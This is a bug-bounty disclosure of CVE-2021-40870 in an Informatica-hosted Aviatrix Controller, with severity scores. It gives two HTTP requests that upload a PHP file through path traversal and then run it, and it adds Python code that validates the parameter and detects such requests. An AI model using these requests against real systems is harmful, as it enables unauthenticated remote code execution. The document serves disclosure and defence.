
Informatica: CVE-2021-40870 in [███]

2021-10-06 04:33:57
fdeleite
hackerone.com

CVSS3: 9.8 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS2: 7.5 High
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

EPSS: 0.948 High
Percentile: 98.9%

An issue was discovered in Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.

The IP has an SSL certificate pointing to Informatica LLC.
curl -kvI https://█████████

Output

 Server certificate:
*  subject: ██████

Steps To Reproduce

First, run this request:

POST /v1/backend1 HTTP/1.1
Host: ████████
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Content-Length: 136
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/1yv4QQmkj4h4OdmmyT11tkiGf5M.php&data=RCE<?php phpinfo()?>

Then retrieve the content of the file 1yv4QQmkj4h4OdmmyT11tkiGf5M.php:

GET /v1/1yv4QQmkj4h4OdmmyT11tkiGf5M.php HTTP/1.1
Host: ████
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

Which is basically the output of the phpinfo function:

Response (truncated):

<tr><th>Variable</th><th>Value</th></tr>
<tr><td>SCRIPT_URL </td><td>/v1/1.php </td></tr>
<tr><td>SCRIPT_URI </td><td>https://█████████/v1/1.php </td></tr>
<tr><td>HTTPS </td><td>on </td></tr>
<tr><td>SSL_SERVER_S_DN_C </td><td>US </td></tr>
<tr><td>SSL_SERVER_S_DN_ST </td><td>California </td></tr>
<tr><td>SSL_SERVER_S_DN_L </td><td>Redwood City </td></tr>
<tr><td>SSL_SERVER_S_DN_O </td><td>Informatica LLC </td></tr>
<tr><td>SSL_SERVER_S_DN_OU </td><td>██████ </td></tr>
<tr><td>SSL_SERVER_S_DN_CN </td><td>██████ </td></tr>
<tr><td>SSL_SERVER_I_DN_C </td><td>US </td></tr>
<tr><td>SSL_SERVER_I_DN_O </td><td>HydrantID (Avalanche Cloud Corporation) </td></tr>
<tr><td>SSL_SERVER_I_DN_CN </td><td>HydrantID SSL ICA G2 </td></tr>
<tr><td>SSL_SERVER_SAN_DNS_0 </td><td>███ </td></tr>
<tr><td>SSL_VERSION_INTERFACE </td><td>mod_ssl/2.4.39 </td></tr>
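The root cause in the two requests above is an account_name value that is used as a filesystem path without validation, combined with attacker-controlled file content and extension. As an added defender-side example (not code from the report or from Aviatrix), the following Python shows the input validation the backend needs for such a parameter, plus a classifier that flags request bodies of the kind shown above for detection. The function names, the base directory, and the benign sample body are constructed assumptions; the malicious body is the one from the report.

```python
"""Validation and detection for a path-derived form parameter.

Added illustration, not the controller's own code. Assumes a handler that
receives ``account_name`` and ``data`` as in the report's POST body and writes
per-account state under a fixed base directory.
"""
import re
import urllib.parse
from pathlib import Path

# Constructed base directory for the illustration (assumption).
BASE_DIR = Path("/tmp/aviatrix_demo/metrics")

# Allow-list: letters, digits, '_' and '-' only. No '/', '\\', '.' or NUL,
# so neither traversal nor an attacker-chosen extension can get through.
ACCOUNT_NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")

# Matches a '..' path component, with either separator, after decoding.
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.($|[\\/])")


def safe_account_path(account_name: str, base_dir: Path = BASE_DIR) -> Path:
    """Map an account name to a file under base_dir, or raise ValueError.

    Two independent checks: the character allow-list, and a containment check
    on the resolved path so that even an unexpected bypass of the first check
    cannot escape base_dir. The extension is fixed, never taken from input.
    """
    if not ACCOUNT_NAME_RE.fullmatch(account_name):
        raise ValueError("account_name contains characters outside the allow-list")
    base = base_dir.resolve()
    target = (base / account_name).resolve()
    if base not in target.parents:
        raise ValueError("resolved path escapes base directory")
    return target.with_suffix(".json")


def account_name_accepted(account_name: str) -> bool:
    """Convenience wrapper: True if safe_account_path() accepts the name."""
    try:
        safe_account_path(account_name)
        return True
    except ValueError:
        return False


def is_traversal_attempt(value: str) -> bool:
    """True if the value contains a '..' component, after up to two rounds of
    URL-decoding (catches %2e%2e and %252e%252e style encodings)."""
    decoded = value
    for _ in range(2):
        decoded = urllib.parse.unquote_plus(decoded)
    return bool(TRAVERSAL_RE.search(decoded))


def classify_body(body: str) -> dict:
    """Flag a form-encoded POST body for the set_metric_gw_selections action.

    Returns three booleans a WAF rule or log review would key on: traversal in
    account_name, a PHP open tag in data, and a server-side extension in the name.
    """
    fields = urllib.parse.parse_qs(body, keep_blank_values=True)
    account = fields.get("account_name", [""])[0]
    data = fields.get("data", [""])[0]
    return {
        "traversal": is_traversal_attempt(account),
        "php_tag": "<?php" in data.lower() or "<?=" in data,
        "bad_extension": account.lower().endswith((".php", ".phtml", ".phar")),
    }


# Request body copied from the report's first request.
REPORT_BODY = (
    "CID=x&action=set_metric_gw_selections"
    "&account_name=/../../../var/www/php/1yv4QQmkj4h4OdmmyT11tkiGf5M.php"
    "&data=RCE<?php phpinfo()?>"
)
# Constructed benign body for comparison (assumption about the normal shape).
BENIGN_BODY = "CID=x&action=set_metric_gw_selections&account_name=prod-account_01&data=gw1,gw2"


if __name__ == "__main__":
    for label, body in (("report", REPORT_BODY), ("benign", BENIGN_BODY)):
        print(label, classify_body(body))
    print("prod-account_01 accepted:", account_name_accepted("prod-account_01"))
    print("report account_name accepted:",
          account_name_accepted("/../../../var/www/php/1yv4QQmkj4h4OdmmyT11tkiGf5M.php"))
```

The allow-list alone would have stopped the report's request; the containment check is there because allow-lists get loosened over time, and the fixed ".json" extension removes the second ingredient (a web-server-executed extension) independently of the path check. On the detection side, classify_body() is the kind of rule to run over the body of POST /v1/backend1 requests in access logs or at a reverse proxy.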

Impact

  • An unauthenticated, 3rd-party attacker or adversary can execute remote code

Supporting Material/References

https://vulners.com/cve/CVE-2021-40870
